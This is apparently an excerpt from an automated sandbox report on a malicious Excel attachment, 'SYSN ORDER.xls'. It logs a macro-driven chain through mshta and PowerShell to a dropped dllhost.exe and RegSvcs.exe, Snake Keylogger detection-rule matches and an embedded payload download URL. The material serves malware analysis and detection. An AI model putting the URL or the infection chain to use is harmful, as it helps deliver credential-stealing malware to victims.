            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: unknown, HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49170 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49169 version: TLS 1.2
            Source: C:\Windows\System32\mshta.exe, Window created: window name: CLIPBRDWNDCLASS

            System Summary

            Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
            Source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
            Source: SYSN ORDER.xls, OLE: Microsoft Excel 2007+
            Source: B8230000.0.dr, OLE: Microsoft Excel 2007+
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbokkworkingforupdate[1].hta
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\dllhost.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe
            Source: C:\Users\user\AppData\Roaming\dllhost.exe, Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CC8D814_2_004CC8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C98E814_2_004C98E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C4CE814_2_004C4CE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C4CF814_2_004C4CF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C148014_2_004C1480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C489014_2_004C4890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C48A014_2_004C48A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C9D4014_2_004C9D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C514014_2_004C5140
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C515014_2_004C5150
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C217814_2_004C2178
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C1D2014_2_004C1D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C1D3014_2_004C1D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C25D014_2_004C25D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CA5E114_2_004CA5E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CA5F014_2_004CA5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C59F014_2_004C59F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C218814_2_004C2188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CA18814_2_004CA188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CA19814_2_004CA198
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C55A814_2_004C55A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C55A014_2_004C55A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CAA4814_2_004CAA48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C5A0014_2_004C5A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C7A1014_2_004C7A10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C2A2814_2_004C2A28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C2A3814_2_004C2A38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CAA3814_2_004CAA38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C32D914_2_004C32D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C32E814_2_004C32E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C2E8114_2_004C2E81
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C769814_2_004C7698
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C2E9014_2_004C2E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CAE9014_2_004CAE90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CAEA014_2_004CAEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C374014_2_004C3740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C076814_2_004C0768
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CB76714_2_004CB767
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C077814_2_004C0778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CB77814_2_004CB778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C030F14_2_004C030F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C870814_2_004C8708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CB31114_2_004CB311
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C032014_2_004C0320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CB32014_2_004CB320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C373214_2_004C3732
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C0BC014_2_004C0BC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CBBC114_2_004CBBC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C0BD014_2_004C0BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004CBBD014_2_004CBBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C3FE014_2_004C3FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C3FF014_2_004C3FF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C3B8814_2_004C3B88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004C3B9814_2_004C3B98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0089069014_2_00890690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00890CD814_2_00890CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0089004014_2_00890040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0089001214_2_00890012
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D503823_2_002D5038
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D305523_2_002D3055
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D389123_2_002D3891
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D78CB23_2_002D78CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D413023_2_002D4130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D291023_2_002D2910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002DD1E823_2_002DD1E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D5B1823_2_002D5B18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D3B7023_2_002D3B70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D2BF023_2_002D2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D441023_2_002D4410
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D844823_2_002D8448
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D35B023_2_002D35B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D3E5123_2_002D3E51
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D674123_2_002D6741
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002DC75023_2_002DC750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D502823_2_002D5028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D700123_2_002D7001
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D6BA023_2_002D6BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002D746123_2_002D7461
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002DFCAD23_2_002DFCAD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002DC74423_2_002DC744
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_002DBFC823_2_002DBFC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044F46023_2_0044F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044D4E023_2_0044D4E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044C48023_2_0044C480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044E17823_2_0044E178
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00445E5823_2_00445E58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044EE1023_2_0044EE10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044DB3023_2_0044DB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044E7C023_2_0044E7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044444423_2_00444444
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044444823_2_00444448
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044945923_2_00449459
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044946823_2_00449468
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044147023_2_00441470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044101B23_2_0044101B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044102823_2_00441028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044C02823_2_0044C028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00446CC823_2_00446CC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004418C923_2_004418C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004418D823_2_004418D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044C8D823_2_0044C8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004498E823_2_004498E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00444CE823_2_00444CE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00444CF823_2_00444CF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044148023_2_00441480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004448A023_2_004448A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00446CBC23_2_00446CBC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00449D4023_2_00449D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044514023_2_00445140
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044515023_2_00445150
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044217823_2_00442178
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00441D2B23_2_00441D2B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00441D3023_2_00441D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004425D023_2_004425D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004425E023_2_004425E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044A5E123_2_0044A5E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044A5F023_2_0044A5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004459FD23_2_004459FD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044218823_2_00442188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044A18823_2_0044A188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044A19823_2_0044A198
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004455A523_2_004455A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004455A823_2_004455A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044AA4823_2_0044AA48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00445A0023_2_00445A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00447A0023_2_00447A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00447A1023_2_00447A10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00442A2823_2_00442A28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00442A3823_2_00442A38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044AA3823_2_0044AA38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004432DC23_2_004432DC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004432E823_2_004432E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_004486F923_2_004486F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00442E8123_2_00442E81
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00442E9023_2_00442E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044AE9023_2_0044AE90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044769823_2_00447698
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044AEA023_2_0044AEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044374023_2_00443740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044B76723_2_0044B767
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044076823_2_00440768
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044077823_2_00440778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044B77823_2_0044B778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044030F23_2_0044030F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044870823_2_00448708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044B31123_2_0044B311
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044032023_2_00440320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044B32023_2_0044B320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044373423_2_00443734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00440BC023_2_00440BC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044BBC123_2_0044BBC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00440BD023_2_00440BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0044BBD023_2_0044BBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00443FE823_2_00443FE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00443FF023_2_00443FF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00443B8823_2_00443B88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00443B9823_2_00443B98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0056004023_2_00560040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_00560CD823_2_00560CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0056069023_2_00560690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_0056000623_2_00560006
            Source: SYSN ORDER.xls OLE indicator, VBA macros: true
            Source: SYSN ORDER.xls Stream path 'MBD001B9740/\x1Ole' : https://og1.in/cIP5a8miBIeF/GQC',"YaFEdijZulawZYSksOQlKCUWxjdwUoA4h2GpYRQlYTPBA24YDisF2ZW9APJjMjVsD7InAfF30tXJqFHsNJPHgLhKVU47sdTJoHRZ7OtgjdqGyE1Z0FmDcCYjJOrVYsLAqhDnTkepq0MsMMtBouvigw8ZmOmIM31YFW10fPTlf5IBCSDjDt3SxoGb4QB8m46M0Pdma40d9k1F5XnmlLNx1GSAAJYMbxkk21wpXsW4Idy01pDY)?sjXp2w_]%jW<
            Source: B8230000.0.dr Stream path 'MBD001B9740/\x1Ole' : https://og1.in/cIP5a8miBIeF/GQC',"YaFEdijZulawZYSksOQlKCUWxjdwUoA4h2GpYRQlYTPBA24YDisF2ZW9APJjMjVsD7InAfF30tXJqFHsNJPHgLhKVU47sdTJoHRZ7OtgjdqGyE1Z0FmDcCYjJOrVYsLAqhDnTkepq0MsMMtBouvigw8ZmOmIM31YFW10fPTlf5IBCSDjDt3SxoGb4QB8m46M0Pdma40d9k1F5XnmlLNx1GSAAJYMbxkk21wpXsW4Idy01pDY)?sjXp2w_]%jW<
            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLS@27/30@46/10
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\B8230000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR8A06.tmp
            Source: SYSN ORDER.xls OLE indicator, Workbook stream: true
            Source: B8230000.0.dr OLE indicator, Workbook stream: true
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: SYSN ORDER.xls ReversingLabs: Detection: 21%
            Source: SYSN ORDER.xls Virustotal: Detection: 25%
            Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
